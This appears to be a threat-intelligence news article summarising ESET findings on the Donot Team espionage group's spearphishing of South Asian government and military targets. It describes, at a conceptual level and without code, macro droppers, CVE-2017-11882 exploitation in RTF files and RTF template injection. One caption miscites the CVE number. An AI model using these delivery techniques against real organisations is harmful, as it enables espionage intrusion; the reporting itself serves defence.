Donot also known as APT-C-35 has been targeting south Asian organizations and individuals since 2016. Amnesty International reported that the group’s malware is found to be linked with an Indian Cybersecurity company that offers hackers-for-hire for the government.
Researchers at ESET have traced several windows malware campaigns from their yty malware framework- which is used to collect and infiltrate data, for the past two years consistently. They also found Darkmusican and Gedit malware on their recent campaigns. Most of their campaigns are motivated by espionage.
Attacks of the Donot Team are focused on
- Military and Government Organisations
- Ministries of Foreign Affairs
Try After Sometime
As ESET Telemetry states, Donot has been targeting the same entities consistently with spearphishing emails with malicious attachments every four months. On an interesting side note, there were no signs of spoofed emails from the attackers which leads to the suspicion of compromised email accounts. There might be a possibility that some of the email accounts or email servers of the organizations could’ve been compromised on earlier campaigns.
Some of the APT operators regain access to a previously compromised network which is achieved by the deployment of a stealthy backdoor before leaving the network. They also start with a new malware or a new variant of old malware. In the case of Donot, they are persistent in regaining their access.
The attackers used malicious Microsoft Office documents to deploy their malware and drop them through spearphishing emails. Researchers at ESET noticed three techniques used by the Donot team.
- Macros in word, Excel or Powerpoint
(Malicious macro in a PowerPoint document that drops a downloader executable and creates a scheduled task to run it)
- Exploiting Memory Corruption Vulnerability (CVE-2017-11882) with RTF files with .doc extension files. This technique allows the attackers to run shellcode which requires no user interaction which deploys the main components of the malware.
(CLSID of the COM object used by the RTF document to load the Equation Editor; the ensuing OLE object contains the CVE-2017-1182 exploit)
(The OLE object headers of the DLLs also embedded in the RTF document)
- RTF Template injection is used as the final technique which allows the download of RTF document from a remote server when the payload is opened. To achieve this, a URL is inserted in the \*\template control word of the RTF file format instead of the location of a local file source. Donot team uses another document that exploits CVE-2017-11882 and is loaded automatically once it is downloaded.
A complete documentation of this malware is released by the ESET team which shows the exploitation frameworks used and the methods and codes used by the Donot team.